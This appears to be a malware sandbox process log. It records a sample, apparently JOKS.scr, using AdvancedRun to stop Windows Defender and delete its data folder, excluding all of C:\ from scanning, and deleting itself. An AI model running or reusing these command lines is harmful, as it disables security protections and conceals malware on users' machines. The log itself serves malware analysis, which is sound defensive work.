AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
2228AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
2384powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\test22\AppData\Local\Temp\JOKS.scr" -Force
2512powershell.exe powershell Add-MpPreference -ExclusionPath C:\
2952cmd.exe "C:\Windows\System32\cmd.exe"
448explorer.exe C:\Windows\Explorer.EXE
1156